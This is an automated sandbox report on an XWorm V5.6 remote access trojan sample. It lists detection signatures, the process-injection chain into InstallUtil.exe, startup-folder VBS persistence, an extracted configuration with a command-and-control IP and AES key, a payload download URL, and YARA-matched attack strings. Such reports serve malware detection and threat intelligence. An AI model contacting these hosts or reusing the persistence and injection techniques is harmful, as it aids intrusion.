Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
zXtG0a5Gt0.exe

Overview

General Information

Sample name:zXtG0a5Gt0.exe
renamed because original name is a hash value
Original sample name:dc3657abea2cc9c36a8f7a7cf4f61a22ba2172bd1040c229d5b2cdd8af10bff0.exe
Analysis ID:1631786
MD5:89757ce41562cf1c80dbc27625d64cbb
SHA1:2ba3c337f490e647361869e54116f08aa190a983
SHA256:dc3657abea2cc9c36a8f7a7cf4f61a22ba2172bd1040c229d5b2cdd8af10bff0
Tags:exeuser-adrian__luca
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
Yara detected XWorm
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Drops VBS files to the startup folder
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Sample uses string decryption to hide its real strings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • zXtG0a5Gt0.exe (PID: 7912 cmdline: "C:\Users\user\Desktop\zXtG0a5Gt0.exe" MD5: 89757CE41562CF1C80DBC27625D64CBB)
    • InstallUtil.exe (PID: 7632 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
      • WerFault.exe (PID: 3484 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7632 -s 908 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
{"C2 url": ["147.124.212.231"], "Aes key": "6262", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
SourceRuleDescriptionAuthorStrings
00000006.00000002.2534889840.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000006.00000002.2534889840.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x79e0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x7a7d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x7b92:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x768e:$cnc4: POST / HTTP/1.1
    00000001.00000002.1370075880.0000000006150000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000001.00000002.1355552792.0000000002616000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000001.00000002.1355552792.0000000002616000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
          Click to see the 6 entries
          SourceRuleDescriptionAuthorStrings
          1.2.zXtG0a5Gt0.exe.26c1fbc.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
            1.2.zXtG0a5Gt0.exe.26c1fbc.0.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
            • 0x47c4:$str01: $VB$Local_Port
            • 0x47b5:$str02: $VB$Local_Host
            • 0x4a9f:$str03: get_Jpeg
            • 0x4474:$str04: get_ServicePack
            • 0x551c:$str05: Select * from AntivirusProduct
            • 0x571a:$str06: PCRestart
            • 0x572e:$str07: shutdown.exe /f /r /t 0
            • 0x57e0:$str08: StopReport
            • 0x57b6:$str09: StopDDos
            • 0x58ac:$str10: sendPlugin
            • 0x5a4a:$str12: -ExecutionPolicy Bypass -File "
            • 0x5b73:$str13: Content-length: 5235
            1.2.zXtG0a5Gt0.exe.26c1fbc.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x5de0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x5e7d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x5f92:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x5a8e:$cnc4: POST / HTTP/1.1
            1.2.zXtG0a5Gt0.exe.6150000.10.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              6.2.InstallUtil.exe.400000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                Click to see the 9 entries

                Data Obfuscation

                barindex
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\zXtG0a5Gt0.exe, ProcessId: 7912, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ticks.vbs
                No Suricata rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: zXtG0a5Gt0.exeAvira: detected
                Source: C:\Users\user\AppData\Roaming\Ticks.exeAvira: detection malicious, Label: TR/Dldr.Agent.juage
                Source: 00000001.00000002.1355552792.0000000002616000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["147.124.212.231"], "Aes key": "6262", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                Source: C:\Users\user\AppData\Roaming\Ticks.exeReversingLabs: Detection: 65%
                Source: zXtG0a5Gt0.exeVirustotal: Detection: 61%Perma Link
                Source: zXtG0a5Gt0.exeReversingLabs: Detection: 65%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: 00000006.00000002.2534889840.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: 147.124.212.231
                Source: 00000006.00000002.2534889840.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: 6262
                Source: 00000006.00000002.2534889840.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: <Xwormmm>
                Source: 00000006.00000002.2534889840.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: XWorm V5.6
                Source: 00000006.00000002.2534889840.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: USB.exe
                Source: zXtG0a5Gt0.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.4:49717 version: TLS 1.2
                Source: zXtG0a5Gt0.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: \??\C:\Windows\System.pdbrsio source: InstallUtil.exe, 00000006.00000002.2535890695.00000000010D4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: nC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 00000006.00000002.2535189290.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdb source: InstallUtil.exe, 00000006.00000002.2535890695.0000000001062000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: InstallUtil.exe, 00000006.00000002.2535890695.00000000010D4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\System.pdb source: InstallUtil.exe, 00000006.00000002.2535890695.00000000010D4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: n.pdb source: InstallUtil.exe, 00000006.00000002.2535189290.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: zXtG0a5Gt0.exe, 00000001.00000002.1371129170.0000000006460000.00000004.08000000.00040000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003842000.00000004.00000800.00020000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003892000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: ((.pdb source: InstallUtil.exe, 00000006.00000002.2535189290.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000006.00000002.2535890695.00000000010D4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: n8C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000006.00000002.2535189290.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\System.pdbl, P source: InstallUtil.exe, 00000006.00000002.2535890695.00000000010D4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\InstallUtil.pdb4 source: InstallUtil.exe, 00000006.00000002.2535890695.00000000010D4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: zXtG0a5Gt0.exe, 00000001.00000002.1371129170.0000000006460000.00000004.08000000.00040000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003842000.00000004.00000800.00020000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003892000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdb source: InstallUtil.exe, 00000006.00000002.2535189290.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003976000.00000004.00000800.00020000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003943000.00000004.00000800.00020000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1370260672.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 00000006.00000002.2535890695.000000000107D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003976000.00000004.00000800.00020000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003943000.00000004.00000800.00020000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1370260672.00000000061B0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\InstallUtil.pdbQ source: InstallUtil.exe, 00000006.00000002.2535890695.00000000010D4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000006.00000002.2535189290.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 4x nop then jmp 0612D029h1_2_0612CFE5
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 4x nop then jmp 0612D029h1_2_0612D1E7
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 4x nop then jmp 0620384Bh1_2_06203668
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 4x nop then jmp 0620384Bh1_2_06203678
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 4x nop then jmp 0620384Bh1_2_0620374E

                Networking

                barindex
                Source: Malware configuration extractorURLs: 147.124.212.231
                Source: Joe Sandbox ViewIP Address: 194.15.112.248 194.15.112.248
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: global trafficHTTP traffic detected: GET /wacv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: oshi.atConnection: Keep-Alive
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /wacv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: oshi.atConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: oshi.at
                Source: zXtG0a5Gt0.exe, Ticks.exe.1.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                Source: zXtG0a5Gt0.exe, Ticks.exe.1.drString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                Source: zXtG0a5Gt0.exe, Ticks.exe.1.drString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
                Source: zXtG0a5Gt0.exe, Ticks.exe.1.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                Source: zXtG0a5Gt0.exe, Ticks.exe.1.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                Source: zXtG0a5Gt0.exe, Ticks.exe.1.drString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                Source: zXtG0a5Gt0.exe, Ticks.exe.1.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                Source: zXtG0a5Gt0.exe, Ticks.exe.1.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                Source: zXtG0a5Gt0.exe, 00000001.00000002.1355552792.0000000002561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: zXtG0a5Gt0.exe, Ticks.exe.1.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                Source: zXtG0a5Gt0.exe, Ticks.exe.1.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                Source: zXtG0a5Gt0.exe, Ticks.exe.1.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                Source: zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003976000.00000004.00000800.00020000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003943000.00000004.00000800.00020000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1370260672.00000000061B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                Source: zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003976000.00000004.00000800.00020000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003943000.00000004.00000800.00020000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1370260672.00000000061B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                Source: zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003976000.00000004.00000800.00020000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003943000.00000004.00000800.00020000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1370260672.00000000061B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                Source: zXtG0a5Gt0.exe, 00000001.00000002.1355552792.0000000002561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at
                Source: zXtG0a5Gt0.exe, 00000001.00000002.1355552792.0000000002561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at/wacv
                Source: zXtG0a5Gt0.exe, Ticks.exe.1.drString found in binary or memory: https://oshi.at/wacvWMust
                Source: zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003976000.00000004.00000800.00020000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003943000.00000004.00000800.00020000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1370260672.00000000061B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                Source: zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003976000.00000004.00000800.00020000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003943000.00000004.00000800.00020000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1370260672.00000000061B0000.00000004.08000000.00040000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1355552792.0000000002616000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                Source: zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003976000.00000004.00000800.00020000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003943000.00000004.00000800.00020000.00000000.sdmp, zXtG0a5Gt0.exe, 00000001.00000002.1370260672.00000000061B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                Source: zXtG0a5Gt0.exe, 00000001.00000002.1368563919.0000000005E71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/r
                Source: zXtG0a5Gt0.exe, Ticks.exe.1.drString found in binary or memory: https://www.globalsign.com/repository/0
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.4:49717 version: TLS 1.2

                System Summary

                barindex
                Source: 1.2.zXtG0a5Gt0.exe.26c1fbc.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 1.2.zXtG0a5Gt0.exe.26c1fbc.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 6.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 6.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 1.2.zXtG0a5Gt0.exe.26c1fbc.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 1.2.zXtG0a5Gt0.exe.26c1fbc.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000006.00000002.2534889840.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000001.00000002.1355552792.0000000002616000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_055F7130 NtProtectVirtualMemory,1_2_055F7130
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_055FA988 NtResumeThread,1_2_055FA988
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_055F712A NtProtectVirtualMemory,1_2_055F712A
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_055FA982 NtResumeThread,1_2_055FA982
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_04A42C691_2_04A42C69
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_04A426E81_2_04A426E8
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_04A426D81_2_04A426D8
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_055F38C81_2_055F38C8
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_055F8EC81_2_055F8EC8
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_055F003A1_2_055F003A
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_055F38B81_2_055F38B8
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_055F8EB91_2_055F8EB9
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_060097631_2_06009763
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_06005A281_2_06005A28
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_06001F591_2_06001F59
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_06001F681_2_06001F68
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_0600DC7F1_2_0600DC7F
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_0600DC901_2_0600DC90
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_06007DF01_2_06007DF0
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_06045C481_2_06045C48
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_060430821_2_06043082
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_060430881_2_06043088
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_060422AA1_2_060422AA
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_060422F81_2_060422F8
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_06070E211_2_06070E21
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_06070E301_2_06070E30
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_0607E2881_2_0607E288
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_060772F31_2_060772F3
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_060773001_2_06077300
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_060779B71_2_060779B7
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_06128FF81_2_06128FF8
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_0612E4B01_2_0612E4B0
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_0612F1A81_2_0612F1A8
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_0612F62E1_2_0612F62E
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_0612E4A11_2_0612E4A1
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_0612F1971_2_0612F197
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_061434281_2_06143428
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_06146C781_2_06146C78
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_0614B2781_2_0614B278
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_06148E701_2_06148E70
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_06148E801_2_06148E80
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_06146C691_2_06146C69
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_0614A5601_2_0614A560
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_061415901_2_06141590
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_061415A01_2_061415A0
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_0614A5601_2_0614A560
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_06144B181_2_06144B18
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_061400061_2_06140006
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_061400401_2_06140040
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_0620B0201_2_0620B020
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_0620B0301_2_0620B030
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_06201AA21_2_06201AA2
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_06201AB01_2_06201AB0
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_062176C01_2_062176C0
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_062198581_2_06219858
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_0621D9E01_2_0621D9E0
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_062176B01_2_062176B0
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_0621A5401_2_0621A540
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_0621A5501_2_0621A550
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_0621001F1_2_0621001F
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_0621EFDB1_2_0621EFDB
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_0621DD071_2_0621DD07
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_0621984B1_2_0621984B
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_0652FB401_2_0652FB40
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_0652F8901_2_0652F890
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_0652DF781_2_0652DF78
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_065100401_2_06510040
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_0652E4181_2_0652E418
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_065100061_2_06510006
                Source: C:\Users\user\Desktop\zXtG0a5Gt0.exeCode function: 1_2_06045C431_2_06045C43
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_012E12D86_2_012E12D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7632 -s 908
                Source: zXtG0a5Gt0.exeStatic PE information: invalid certificate
                Source: zXtG0a5Gt0.exe, 00000001.00000002.1371129170.0000000006460000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs zXtG0a5Gt0.exe
                Source: zXtG0a5Gt0.exe, 00000001.00000002.1354783384.000000000075E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs zXtG0a5Gt0.exe
                Source: zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003976000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs zXtG0a5Gt0.exe
                Source: zXtG0a5Gt0.exe, 00000001.00000000.1266020504.00000000002BC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamereff.exe, vs zXtG0a5Gt0.exe
                Source: zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003842000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs zXtG0a5Gt0.exe
                Source: zXtG0a5Gt0.exe, 00000001.00000002.1365290075.0000000003943000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs zXtG0a5Gt0.exe
                Source: zXtG0a5Gt0.exe, 00000001.00000002.1355552792.000000000275B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRAw.exe4 vs zXtG0a5Gt0.exe
                Source: zXtG0a5Gt0.exe, 00000001.00000002.1355552792.00000000025AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs zXtG0a5Gt0.exe
